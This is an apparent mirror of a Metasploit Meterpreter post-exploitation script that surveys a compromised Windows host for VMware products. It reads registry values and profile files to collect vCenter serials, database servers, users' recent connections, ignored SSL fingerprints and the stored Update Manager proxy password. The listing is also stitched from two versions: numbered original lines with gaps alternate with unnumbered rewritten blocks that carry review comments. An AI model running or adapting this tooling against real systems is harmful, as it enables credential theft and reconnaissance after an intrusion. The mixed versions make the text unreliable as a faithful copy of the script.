Mirror of metasploit

enum_vmware.rb 13KB


  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. # Author: Carlos Perez at carlos_perez[at]darkoperator.com
  7. #-------------------------------------------------------------------------------
  8. ################## Variable Declarations ##################
# Keep a reference to the Meterpreter session object so the helper methods
# defined below can reach it through @client.
@client = client

# The only option this script understands is -h.
opts = Rex::Parser::Arguments.new(
  "-h" => [false, "Help menu."]
)

opts.parse(args) do |opt, _idx, _val|
  next unless opt == "-h"

  print_line("vmware_enum -- Enumerates VMware Configurations for VMware Products")
  print_line("USAGE: run vmware_enum")
  print_line(opts.usage)
  # Raised after the usage text has been printed, so nothing below runs for -h.
  raise Rex::Script::Completed
end
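# Lists the subkeys of HKLM\SOFTWARE\VMware, Inc. and prints each one as an
# installed product.
#
# The registry handle is released in an ensure block once the subkey names
# have been read; check_vmsoft closes its handle as well, while the original
# version of this method left the key open.
#
# @return [Array<String>] the subkey names returned by enum_key
def check_prods()
  key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\VMware, Inc.', KEY_READ)
  begin
    products = key.enum_key
  ensure
    key.close
  end
  print_status("The Following Products are installed on this host:")
  products.each { |product| print_status("\t#{product}") }
  products
end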
  31. def check_vmsoft
  32. installed = false
  33. key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE', KEY_READ)
  34. sfmsvals = key.enum_key
  35. if sfmsvals.include?("VMware, Inc.")
  36. print_status("VMware Products are Installed in Host")
  37. installed = true
  38. else
  39. print_error("No VMware Products where found in this Host.")
  40. end
  41. key.close
  42. return installed
  43. end
# Prints the VirtualCenter settings stored under
# HKLM\SOFTWARE\VMware, Inc.\VMware VirtualCenter together with the database
# name and server of the ODBC data source that key points at.
#
# All registry values are read first, in a fixed order, and printed afterwards.
# The ODBC username/password lookup was left commented out by the original
# author and is not performed here either.
# NOTE(review): .chomp is called on the ODBC name without a nil check; confirm
# what registry_getvaldata returns when the value is missing.
def enum_vcenter
  print_status("Information about Virtual Center:")

  vc_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter"
  vc_db_key = "#{vc_key}\\DB"

  version     = registry_getvaldata(vc_key, "InstalledVersion")
  serial      = registry_getvaldata(vc_key, "Serial")
  db_instance = registry_getvaldata(vc_key, "DBInstanceName")
  db_type     = registry_getvaldata(vc_key, "DBServerType")
  tomcat_ver  = registry_getvaldata("#{vc_key}\\Tomcat", "Version")
  group_type  = registry_getvaldata(vc_key, "GroupType")
  odbc_name   = registry_getvaldata(vc_db_key, "1")
  odbc_type   = registry_getvaldata(vc_db_key, "4")

  # The data source name read above selects the ODBC.INI subkey to query.
  odbc_key  = "HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{odbc_name.chomp}"
  db_name   = registry_getvaldata(odbc_key, "Database")
  db_server = registry_getvaldata(odbc_key, "Server")

  print_status("\tVersion: #{version}")
  print_status("\tSerial: #{serial}")
  print_status("\tvCenter Type: #{group_type}")
  print_status("\tTomcat Version: #{tomcat_ver}")
  print_status("\tDatabase Instance: #{db_instance}")
  print_status("\tDatabase Type: #{db_type}")
  print_status("\tDatabase Name: #{db_name}")
  print_status("\tDatabase Server: #{db_server}")
  print_status("\tODBC Name: #{odbc_name}")
  print_status("\tODBC Type: #{odbc_type}")
end
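# Prints what the registry holds about the VMware VI Client: installed
# version, registered plugins, and per-user recent connections and ignored
# SSL certificates.
#
# When is_system? is false only the current user's hive (HKCU) is read.
# Otherwise the subkeys of HKU that look like user SIDs are read one by one.
#
# Two defects of the original are corrected:
# * the per-user SSLIgnore value was looked up under "HCU\\<sid>", a hive
#   prefix used nowhere else in this script; it now uses "HKU\\<sid>" like
#   the neighbouring lookups;
# * the handle opened on HKU is closed once the SID list has been read.
#
# NOTE(review): the results of registry_getvaldata / registry_enumkeys are
# used without nil checks, as before; confirm what these helpers return when
# a key or value is missing.
def enum_viclient
  print_status("Information about VMware VI Client:")
  vi_version = nil
  vi_plugins = nil
  begin
    vi_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\4.0", "InstalledVersion")
    vi_plugins = registry_enumvals("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\Plugins")
  rescue
    # Best effort, as in the original: a failed lookup leaves the value nil
    # and the version line below is printed empty.
  end
  print_status("\tVersion: #{vi_version}")

  if vi_plugins
    vi_plugins.each do |plugin|
      label = case plugin
              when /Converter/ then "VMware Converter"
              when /UM/        then "VMware Update Manager"
              else plugin
              end
      print_status("\tPlugin: #{label}")
    end
  end

  if not is_system?
    recentconns = registry_getvaldata("HKCU\\Software\\VMware\\VMware Infrastructure Client\\Preferences", "RecentConnections").split(",")
    print_status("Recent VI Client Connections:")
    recentconns.each { |conn| print_status("\t#{conn}") }

    ssl_ignore_key = "HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore"
    ignore_ssl = registry_enumkeys(ssl_ignore_key)
    if ignore_ssl.length > 0
      print_status("\tIgnored SSL Certs for")
      ignore_ssl.each do |host|
        fingerprint = registry_getvaldata(ssl_ignore_key, host)
        print_status("\tHost: #{host} SSL Fingerprint: #{fingerprint}")
      end
    end
  else
    root_key, base_key = @client.sys.registry.splitkey("HKU\\")
    hku = @client.sys.registry.open_key(root_key, base_key)
    begin
      # Keep only the subkeys whose name ends in an S-1-5-21-...-RID pattern.
      user_sids = hku.enum_key.select { |k| k =~ /S-1-5-21-\d*-\d*-\d*-\d{3,6}$/ }
    ensure
      hku.close
    end

    user_sids.each do |sid|
      begin
        enumed_user = registry_getvaldata("HKU\\#{sid}\\Volatile Environment", "USERNAME")
        print_status("\tRecent VI Client Connections for #{enumed_user}:")
        recentconns = registry_getvaldata("HKU\\#{sid}\\Software\\VMware\\VMware Infrastructure Client\\Preferences", "RecentConnections").split(",")
        recentconns.each { |conn| print_status("\t#{conn}") }

        ssl_ignore_key = "HKU\\#{sid}\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore"
        ignore_ssl = registry_enumkeys(ssl_ignore_key)
        if ignore_ssl.length > 0
          print_status("\tIgnored SSL Certs for #{enumed_user}:")
          ignore_ssl.each do |host|
            fingerprint = registry_getvaldata(ssl_ignore_key, host)
            print_status("\tHost: #{host} SSL Fingerprint: #{fingerprint}")
          end
        end
      rescue
        # Any StandardError while reading this user's hive is reported with
        # the same message the original used.
        print_status("\tUser appears to have not used the software.")
      end
    end
  end
end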
# Prints the VMware Update Manager settings stored under
# HKLM\SOFTWARE\VMware, Inc.\VMware Update Manager and the database name and
# server of the ODBC data source that key points at.
#
# Every value is read before anything is printed. The ProxyPassword value is
# printed exactly as it is stored in the registry. The ODBC username/password
# lookup was left commented out by the original author and is not performed.
#
# NOTE(review): the rescue catches ::Exception rather than StandardError; this
# is kept unchanged because the exception hierarchy of the registry helpers is
# not visible from this file.
def enum_vum
  print_status("Information about VMware Update Manager:")
  begin
    vum_key = "HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager"
    vum_db_key = "#{vum_key}\\DB"

    version        = registry_getvaldata(vum_key, "InstalledVersion")
    server         = registry_getvaldata(vum_key, "VUMServer")
    db_type        = registry_getvaldata(vum_key, "DBServerType")
    # DirectWebAccess is read, as in the original, but never printed.
    registry_getvaldata(vum_key, "DirectWebAccess")
    use_proxy      = registry_getvaldata(vum_key, "UseProxy")
    proxy_server   = registry_getvaldata(vum_key, "ProxyServer")
    proxy_port     = registry_getvaldata(vum_key, "ProxyPort")
    proxy_user     = registry_getvaldata(vum_key, "ProxyUserName")
    proxy_pass     = registry_getvaldata(vum_key, "ProxyPassword")
    vcenter_server = registry_getvaldata(vum_key, "VCServer")
    vcenter_user   = registry_getvaldata(vum_key, "VCUserName")
    patch_store    = registry_getvaldata(vum_key, "PatchStore")
    odbc_name      = registry_getvaldata(vum_db_key, "1")
    odbc_type      = registry_getvaldata(vum_db_key, "4")

    # The data source name read above selects the ODBC.INI subkey to query.
    odbc_key  = "HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{odbc_name.chomp}"
    db_name   = registry_getvaldata(odbc_key, "Database")
    db_server = registry_getvaldata(odbc_key, "Server")

    print_status("\tVersion: #{version}")
    print_status("\tServer: #{server}")
    print_status("\tPatch Store: #{patch_store}")
    print_status("\tDatabse Type: #{db_type}")
    print_status("\tUses Proxy: #{use_proxy}")
    print_status("\tProxy User: #{proxy_user}")
    print_status("\tProxy Password: #{proxy_pass}")
    print_status("\tVirtual Center: #{vcenter_server}")
    print_status("\tVirtual Center User: #{vcenter_user}")
    print_status("\tProxy Server: #{proxy_server}:#{proxy_port}")
    print_status("\tDatabase Name: #{db_name}")
    print_status("\tDatabase Server: #{db_server}")
    print_status("\tODBC Name: #{odbc_name}")
    print_status("\tODBC Type: #{odbc_type}")
  rescue ::Exception => e
    print_status("Error: #{e.class} #{e}")
  end
end
  193. def enum_vdm
  194. print_status("Information about VMware VDM Broker:")
  195. vdm_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VDM","ProductVersion")
  196. print_status("\tVersion: #{vdm_version}")
  197. end
  198. def enum_powercli
  199. print_status("Information about PowerCLI:")
  200. pcli_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI","InstalledVersion")
  201. pcli_install_path = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI","InstallPath")
  202. begin
  203. pcli_poweshell_policy = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\WindowsPowerShell","ExecutionPolicy")
  204. rescue
  205. pcli_poweshell_policy = "Restricted"
  206. end
  207. print_status("\tVersion: #{pcli_version}")
  208. print_status("\tInstalled Pat: #{pcli_install_path}")
  209. print_status("\tPowershell Execution Policy: #{pcli_poweshell_policy}")
  210. end
# Builds the list of user profiles whose VMware application data directory
# the other helpers look at.
#
# The profile layout is chosen by matching the reported OS string against
# /7|Vista|2008/; any other OS string falls through to the
# "Documents and Settings" layout. When the session is SYSTEM every entry in
# the profile root is used except a fixed list of built-in names; otherwise
# only the user named by the USERNAME environment variable is returned.
#
# @return [Array<Hash>] one hash per user with 'username' and 'userappdata' keys
def enum_users
  os_name = @client.sys.config.sysinfo['OS']
  system_drive = @client.sys.config.getenv('SystemDrive')

  if os_name =~ /7|Vista|2008/
    profiles_root = system_drive + "\\users\\"
    appdata_suffix = "\\AppData\\Local\\VMware\\"
  else
    profiles_root = system_drive + "\\Documents and Settings\\"
    appdata_suffix = "\\Application Data\\VMware\\"
  end

  users = []
  if @client.sys.config.is_system?
    print_status("Running as SYSTEM extracting user list..")
    @client.fs.dir.foreach(profiles_root) do |entry|
      # Skip the directory links and the built-in profile names.
      next if entry =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
      users << { 'username' => entry, 'userappdata' => profiles_root + entry + appdata_suffix }
    end
  else
    current_user = @client.sys.config.getenv('USERNAME')
    users << { 'username' => current_user, 'userappdata' => profiles_root + current_user + appdata_suffix }
  end
  users
end
# For each profile returned by enum_users, prints the entries found in the
# VIU\hosts\ directory below that user's VMware application data path.
#
# A directory listing that raises is skipped without any message, so a user
# with no such directory produces only the header line.
def enum_vihosupdt
  print_status("Information about VMware vSphere Host Update Utility:")
  enum_users.each do |profile|
    print_status("\tESX/ESXi Hosts added for Updates for user #{profile['username']}:")
    begin
      hosts_dir = profile['userappdata'] + "VIU\\hosts\\"
      @client.fs.dir.foreach(hosts_dir) do |entry|
        print_status("\t#{entry}") unless entry =~ /^(\.|\.\.)$/
      end
    rescue
      # Deliberately silent, as in the original.
    end
  end
end
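# Reads each user's favorites.vmls file and prints the configuration file
# path and display name of every VMware Workstation VM listed in it.
#
# The contents of all users' files are appended to one buffer and parsed
# after the loop, so the per-user header lines are all printed before any VM
# line. Each remote file handle is now closed in an ensure block; the
# original never closed it. The unused locals `config` and `name` are gone.
#
# NOTE(review): an error opening one user's file still propagates and stops
# the enumeration, as before.
def enum_vmwarewrk
  print_status("Enumerating VMware Workstation VM's:")
  fav_file = ""
  enum_users.each do |u|
    print_status("\tVM's for user #{u['username']}:")
    # The file is looked up under Roaming rather than Local application data.
    path = u['userappdata'].gsub(/Local/, "Roaming")
    account_file = @client.fs.file.new(path + "\\favorites.vmls", "rb")
    begin
      fav_file << account_file.read until account_file.eof?
    ensure
      account_file.close
    end
  end
  fav_file.each_line do |l|
    if l =~ /config/
      print_status("\tConfiguration File: #{l.scan(/vmlist\d*.config \= (\".*\")/)}")
    end
    if l =~ /Name/
      print_status("\tVM Name: #{l.scan(/vmlist\d*.DisplayName \= (\".*\")/)}")
      print_status("")
    end
  end
end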
  279. if client.platform == 'windows'
  280. if check_vmsoft
  281. vmware_products = check_prods()
  282. if vmware_products.include?("VMware VirtualCenter")
  283. enum_vcenter
  284. end
  285. if vmware_products.include?("VMware Virtual Infrastructure Client")
  286. enum_viclient
  287. end
  288. if vmware_products.include?("VMware Update Manager")
  289. enum_vum
  290. end
  291. if vmware_products.include?("VMware VDM")
  292. enum_vdm
  293. end
  294. if vmware_products.include?("VMware vSphere PowerCLI")
  295. enum_powercli
  296. end
  297. if vmware_products.include?("VMware vSphere Host Update Utility 4.0")
  298. enum_vihosupdt
  299. end
  300. if vmware_products.include?("VMware Workstation")
  301. enum_vmwarewrk
  302. end
  303. else
  304. print_status("No VMware Products appear to be installed in this host")
  305. end
  306. else
  307. print_error("This version of Meterpreter is not supported with this Script!")
  308. raise Rex::Script::Completed
  309. end